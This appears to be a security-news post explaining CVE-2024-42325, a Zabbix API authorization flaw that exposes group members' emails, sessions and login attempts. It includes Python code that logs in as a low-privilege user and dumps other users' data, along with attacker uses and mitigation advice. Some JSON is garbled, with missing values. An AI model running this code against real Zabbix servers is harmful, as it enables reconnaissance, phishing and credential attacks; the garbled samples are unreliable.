CVE CyberSecurity Database News

CVE-2024-42325 - Zabbix User Enumeration and Sensitive Information Exposure via API

Poster -

CVE-2024-42325 is a recently disclosed vulnerability affecting Zabbix, the popular open-source monitoring solution. The flaw lies in how the Zabbix API’s user.get method returns user information—allowing an authenticated user to retrieve details about *all* users who share a group with them. This includes sensitive information such as notification media, login attempts, and more. In this post, we’ll break down what this means, how it can be exploited, and give you code examples, references, and mitigation advice.

Understanding the Zabbix user.get API

The Zabbix API is a powerful tool for automating management of Zabbix resources. The user.get method is intended to fetch information about user accounts.

Zabbix uses a system of *user groups* for access control. However, due to improper authorization logic, a user who shares a group with others can retrieve substantial details about everyone in that group—regardless of their own privilege level.

What’s Exposed?

With CVE-2024-42325, anyone with a Zabbix API login—regardless of their own user role—can use the user.get API to enumerate all users in groups they belong to. This leak includes:

The ‘active’ status

- Last login attempts (timestamps, IP addresses, success/failure)

Enumerate valid usernames for credential attacks

- Obtain email/phone details for phishing/social engineering

Example: Exploiting the Leak

Let’s walk through a simple exploit using Python and the requests library.

Suppose you have credentials for a low-privilege monitoring user on a Zabbix installation.

Step 1: Authenticate and Get API Token

import requests

# Set your Zabbix URL
url = "https://your.zabbix.instance/api_jsonrpc.php";

# Step 1: Login as low privilege user
login_payload = {
    "jsonrpc": "2.",
    "method": "user.login",
    "params": {
        "user": "lowprivuser",
        "password": "password123"
    },
    "id": 1,
}

resp = requests.post(url, json=login_payload)
auth_token = resp.json()['result']

Step 2: Call user.get to Dump All Users in Common Groups

# Step 2: Dump user info (media, sessions, etc)
user_get_payload = {
    "jsonrpc": "2.",
    "method": "user.get",
    "params": {
        "output": "extend",
        "selectMedias": "extend",
        "selectUsrGrp": "extend",
        "selectSessions": "extend"
    },
    "auth": auth_token,
    "id": 2
}

user_resp = requests.post(url, json=user_get_payload)
print(user_resp.json())

The above may return something like

{
  "jsonrpc": "2.",
  "result": [
    {
      "userid": "2",
      "alias": "admin",
      "name": "Super User",
      "medias": [
        {"mediaid": "1", "sendto": "admin@example.com", "active": true}
      ],
      "sessions": [
        {"lastaccess": 1685321482, "status": , "attempt_failed": 1}
      ]
    },
    {
      "userid": "5",
      "alias": "bob",
      "name": "Bob Smith",
      "medias": [
        {"mediaid": "2", "sendto": "bob.smith@company.com", "active": true}
      ],
      "sessions": [
        {"lastaccess": 168532150, "status": 1, "attempt_failed": }
      ]
    }
    // ... more users ...
  ],
  "id": 2
}

*Note*: All users in any group your API user belongs to will be included.

Security Implications

Unlike flaws that require a high level of access, CVE-2024-42325 lets any API user enumerate sensitive details just by virtue of group membership. Zabbix environments often use group sharing for operational convenience—increasing the risk.

This may be leveraged as follows

- Reconnaissance: Identify administrators, operators, and their contact info for social engineering.

Phishing Attacks: Use media info (email, phone) for targeted lures.

- Brute-force/Credential Stuffing: Knowing valid usernames helps attackers focus their attacks and evade detection.
- Tracking Usage Patterns: Session data shows who is active, which IPs connect, and how often failed logins occur.

References

- Zabbix: API user.get documentation
- CVE Record for CVE-2024-42325 (pending or see vendor advisory)
- Zabbix Release Notes – check for patch details
- Original Zabbix user.get Example

Update: Patch to the latest version as soon as a fix is available.

- Minimize Group Overlap: Limit which users are in shared groups, especially with sensitive/admin accounts.
- Least Privilege: Assign the minimal API/user permissions necessary for each user.

Monitoring: Watch API logs for unusual queries to user.get returning bulk data.

Vendor patch status can be checked at Zabbix’s official site.

Conclusion

CVE-2024-42325 is a classic example of how “insufficient authorization” can lead to much broader data leaks than expected. Zabbix users should take it seriously—this is an easy pathway for attackers with *any* credentials to map out high-value user accounts and sensitive information.

Patch promptly and review your group structures. Even better, monitor for unexpected API usage. For more technical details, follow the references above or watch security community channels for updates.

Stay safe, and keep your monitoring secure!

*This post is exclusive and based on current research into Zabbix API vulnerabilities as of June 2024.*

Timeline

Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC